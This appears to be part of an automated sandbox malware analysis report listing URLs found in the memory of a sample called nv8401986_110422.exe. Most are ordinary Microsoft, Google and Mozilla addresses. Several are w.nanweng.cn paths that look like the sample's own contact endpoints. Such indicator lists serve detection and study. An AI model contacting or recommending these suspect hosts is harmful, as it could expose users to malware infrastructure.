        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2035873967.00000000040AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/gl1
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/glf
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/lq:
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/lqorA
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/lqti
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.000000000082E000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/png
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/png(
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/pngF
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/pngs
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/pngtps:/
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/rq
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/qy/rqh
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006BFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn/sb_2
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn:80/qy/gl
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn:80/qy/lqnrps0sid360softtm1689880905type20uid102e1490f0604c078f675cf9899bc6e6ver6
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn:80/qy/png
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn:80/qy/pngsersd
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w.nanweng.cn:80/qy/rq
        Source: nv8401986_110422.exeString found in binary or memory: http://www.digicert.com/CPS0
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/#
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/M
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/Q
        Source: nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/x/
        Source: nv8401986_110422.exe, 00000000.00000002.3299397640.000000000D1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.0000000000874000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3302728536.000000000E2C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
        Source: nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cn
        Source: nv8401986_110422.exe, 00000000.00000003.2049616047.000000000AEA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js4r
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js7
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsjs
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jss
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.jsyy
        Source: nv8401986_110422.exe, 00000000.00000002.3274337460.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js$
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js=202501
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.jsj
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.jsq
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004088000.00000004.00000020.00020000.00000000.sdmp, J0K33CCW.htm.0.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js9
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.jsF
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.jsv
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmp, J0K33CCW.htm.0.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js(
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.jsZ
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.jsm
        Source: nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAA5000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000413A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3288070935.000000000B898000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2074343474.000000000B898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/
        Source: nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/$
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/&ocid=iehp&os=windows&locale=
        Source: nv8401986_110422.exe, 00000000.00000002.3288793430.000000000B921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/config/v1/F
        Source: nv8401986_110422.exe, 00000000.00000002.3290752153.000000000BDD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype
        Source: nv8401986_110422.exe, 00000000.00000002.3288186724.000000000B8A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/MSN/Feed/me?$top=32&DisableTypeSerialization=true&activityId=7FF05383
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.png
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.png)
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.png4b0d5b40196862f17.js
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.pngansy
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.pnghidu
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics//pr-3693935/IE11NTP/ie-image.pngm
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.png
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/Icon.png(
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.png
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.png7C
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngMC
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngpC
        Source: nv8401986_110422.exe, 00000000.00000002.3278061822.0000000004740000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AEFB000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000414A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png...
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.png...(
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/logo.pngm
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3296440880.000000000CC20000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3281796416.0000000008DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.png
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.png7)yx
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngC.%y
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngg)
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.000000000406B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/mobile-image.pngw
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.cn
        Source: nv8401986_110422.exe, 00000000.00000002.3288793430.000000000B939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/
        Source: nv8401986_110422.exe, 00000000.00000002.3295020523.000000000CA20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/https://assets.msn.com
        Source: nv8401986_110422.exe, 00000000.00000002.3288186724.000000000B8A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.comhttps://assets.msn.com/resolver/api/resolve/https://assets.msn.cominternetExpl
        Source: nv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.cominternetExplorer
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.microsoftstart.cn/OneCollector/1.0
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.cn/OneCollector/1.0
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3276474159.0000000004114000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134989538.000000000D6D0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134917852.000000000D6CD000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134726476.000000000D6C8000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134166907.000000000D6C0000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2134523903.000000000D6C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-strea
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/U
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c.microsoftstart.cn/c.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3297208007.000000000CD08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c.microsoftstart.com/c.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/K
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3286553261.000000000B6C3000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B060000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3278061822.00000000046AE000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gif?rnd=1735914359600&udc=true&pg.n=startpage&pg.t=hp&pg.c=&pg.p=prime&rf=&tp=ht
        Source: nv8401986_110422.exe, 00000000.00000002.3297552533.000000000CD40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c.msn.com/c.gifhttps://c.msn.cn/c.gif
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cc.bingj.com/cache.aspx?q=
        Source: nv8401986_110422.exe, 00000000.00000002.3283626284.0000000008F00000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2052305080.000000000BCAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cc.bingj.com/cache.aspx?q=--disable-features%3dOptimizationGuideModelDownloading%2cOptimizat
        Source: nv8401986_110422.exe, 00000000.00000003.2016577008.000000000081D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.googl
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/web
        Source: nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
        Source: nv8401986_110422.exe, 00000000.00000003.2017194964.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoref
        Source: nv8401986_110422.exe, 00000000.00000003.2017309772.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreo0
        Source: nv8401986_110422.exe, 00000000.00000003.2017194964.0000000000881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
        Source: nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
        Source: nv8401986_110422.exe, 00000000.00000003.2016577008.0000000000823000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2016666986.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx~
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/
        Source: nv8401986_110422.exe, 00000000.00000002.3297552533.000000000CD40000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.js
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsD
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsL
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000AF05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsP
        Source: nv8401986_110422.exe, 00000000.00000002.3297885994.000000000CD8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsa
        Source: nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsctor/1.0?cors=true&content-type=application/x-json-stream
        Source: nv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jsownl
        Source: nv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.6.3.min.jstandard
        Source: nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla(
        Source: nv8401986_110422.exe, 00000000.00000003.2017117414.000000000084A000.00000004.00000020.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000003.2017046700.000000000084D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
